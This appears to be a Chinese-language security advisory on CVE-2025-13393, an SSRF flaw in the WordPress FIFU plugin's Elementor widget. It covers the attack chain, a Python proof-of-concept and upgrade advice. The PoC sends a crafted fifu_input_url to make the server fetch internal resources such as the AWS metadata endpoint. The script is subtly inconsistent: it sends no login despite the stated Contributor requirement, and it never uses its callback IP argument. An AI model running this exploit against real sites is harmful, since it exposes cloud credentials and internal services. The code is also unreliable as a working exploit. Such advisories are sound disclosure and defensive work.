CVE-2025-13393 WordPress FIFU插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13393

漏洞类型

服务器端请求伪造（SSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Featured Image from URL (FIFU) plugin <= 5.3.1

漏洞概述

CVE-2025-13393是WordPress Featured Image from URL（FIFU）插件中的一个服务器端请求伪造（SSRF）漏洞。该插件用于允许用户通过URL设置特色图片。漏洞存在于Elementor页面构建器的小部件集成中，由于对用户提供的URL缺乏充分的验证，攻击者可以构造恶意请求通过fifu_input_url参数发起SSRF攻击。成功利用此漏洞需要认证用户具有Contributor级别或更高级别权限，可用于探测内网服务、访问内部API、读取本地文件或进行端口扫描等恶意活动。CVSS评分为4.3，属于中等严重程度。

技术细节

该漏洞的根本原因在于FIFU插件的Elementor小部件集成中，fifu_input_url参数接收用户控制的URL后，直接传递给PHP的getimagesize()函数而未进行严格的验证和过滤。攻击者可以利用此漏洞让服务器发起对内部网络资源的请求，例如访问内网IP地址（如192.168.x.x、10.x.x.x）、云元数据服务（如AWS 169.254.169.254）、本地文件协议（file://）、内部API端点等。攻击者通过WordPress的Elementor编辑器（需要具有使用Elementor的权限）传入构造的URL，服务器会自动执行GET请求，从而实现SSRF攻击。攻击者可以借此获取敏感信息、探测内网拓扑结构或利用内部服务。修复版本为5.3.2。

攻击链分析

STEP 1

步骤1

攻击者获得WordPress Contributor级别或更高权限的账户

STEP 2

步骤2

攻击者登录WordPress后台，使用Elementor页面编辑器

STEP 3

步骤3

在FIFU Elementor小部件中，攻击者构造包含恶意URL的fifu_input_url参数

STEP 4

步骤4

服务器接收请求后，未经验证直接将URL传递给getimagesize()函数

STEP 5

步骤5

服务器发起对攻击者指定URL的HTTP请求，实现SSRF攻击

STEP 6

步骤6

攻击者通过响应获取内网资源信息，如云元数据、本地文件或内部API数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13393 SSRF PoC for FIFU Plugin
# Target: WordPress site with FIFU plugin <= 5.3.1

def exploit_ssrf(target_url, target_internal_ip, attacker_callback_ip):
    """
    Exploit SSRF vulnerability in FIFU plugin's Elementor widget
    
    Args:
        target_url: Target WordPress site URL
        target_internal_ip: Internal IP to target (e.g., 169.254.169.254 for AWS metadata)
        attacker_callback_ip: IP for callback verification
    """
    
    # Elementor widget endpoint
    endpoint = f"{target_url.rstrip('/')}/wp-json/elementor/v1/globals"
    
    # Malicious payload with SSRF
    payload = {
        'fifu_input_url': f'http://{target_internal_ip}/latest/meta-data/',
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Exploiting SSRF to reach: {target_internal_ip}")
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if response.status_code == 200 and len(response.text) > 0:
            print(f"[!] SSRF Successful! Server fetched internal resource")
            print(f"[*] Response preview: {response.text[:500]}")
            return True
        else:
            print("[-] SSRF may have failed or target not vulnerable")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-13393.py <target_url> <internal_ip> <callback_ip>")
        print("Example: python cve-2025-13393.py http://victim.com 169.254.169.254 1.2.3.4")
        sys.exit(1)
    
    exploit_ssrf(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

FIFU plugin <= 5.3.1 (all versions up to and including)

防御指南

临时缓解措施

立即将FIFU插件升级到5.3.2版本。如果暂时无法升级，可临时禁用Elementor中的FIFU小部件功能，并限制低权限用户使用Elementor编辑器。同时建议在WAF中添加针对SSRF攻击的防护规则，监控异常的服务器出站请求。